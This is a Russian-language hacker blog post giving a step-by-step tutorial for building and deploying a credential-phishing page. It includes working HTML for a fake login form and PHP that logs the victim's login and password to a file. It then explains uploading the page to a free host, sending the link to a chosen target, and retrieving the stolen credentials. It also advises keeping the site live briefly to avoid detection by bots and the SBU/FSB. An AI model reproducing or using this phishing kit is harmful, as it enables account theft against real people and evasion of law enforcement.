Fishing by tipahack
TipaHackНе было статей. Согласен. Извините что так долго первую статью писал(А точнее я не мог)
Сегодня мы поговорим об Фишинге и о том, как его делать.
Начнём с ингредиентов.
- Нужен Gmail.com аккаунт
- Нужен FTP-клиент(я использую лично FileZilla)
- Нужен OpenServers
- Следовать инструкциям.
И так, сразу скажу, за фишинг идёт статья, поэтому я советую публиковать сайт только в районе на 30 минут или 2 часов. Для тех кто не понял, по интернету ходят боты и собирают инфу о сайта, или же СБУ/ФСБ могут накрыть через DNS.
Теперь с того, как же его сделать?
Нам нужны знания HTML/PHP - минимум.(+JS/CSS максимум)
И так, создаём папку и файл "index.php", папка - будет сайтом, index.php - веб-страницей.
Открывает index.php через любой текстовый редактор и пишем в него -
<html>
<meta charset="utf-8">
<form action="send.php" method="POST">
<input type="text" placeholder="Логин" name="lg">
<input type="password" placeholder="Пароль" name="pw">
<input type="submit" name="sub" value="Войти">
</form>
</html>
Нажимаем Ctrl + S и создаём send.php в том же месте, что и index.php.
в send.php вписываем -
<?
if(isset($_POST['sub']))
{
$handle = fopen('lst.html', 'a+');
fwrite($handle, '<br>name -' . $_POST['lg'] . '<br>pw -' . $_POST['pw']);
echo '<button onclick="location.href=`#`">Accepted</button>`';
} else {
print_r('Отказ! Невозможная отправка! Попробуйте ещё раз.');
};
?>
И нажимаем Ctrl + S, и всё. Сайт готов.
Теперь, нужно его опубликовать. Это можно сделать через открытие портов и использование OpenServers, но я уверен что у вас провайдер запрещает это делать. Поэтому, мы будем использовать FTP-клиент.
Заходим на 7m.pl, регистрируемся, создаём сайт с любым названием и открывает FileZilla. Там мы вводим название сайта полностью, свой ник и пароль, пропускаем ввод порта(если начали вводить, то перезайдите и не нажимайте на эту кнопку). Нажимаешь кнопку и ждём подключения. Подключились? Теперь открывает папку сайта, сносим оттуда все файлы, вкидываем туда свои файлы и ждём.
Проходит время(5 секунд где-то максимум). Сайт загружен. Открываем ссылку и сайт работает. Кидаем ссылку человеку которого хотим взломать и ждём пока он введёт свои данные.(Да кстати, сайт мы не оформили по красоте, вероятность что он введёт туда что-то будет меньше 75%).
Если вы знаете что он ввёл, то заходим на тот же сайт и вписываем - lst.html и там будут его данные. Всё, сайт можно удалять(Через FileZilla, там нужно просто снести файлы свои), не забудьте только скопировать его Логин и Пароль.
Пака.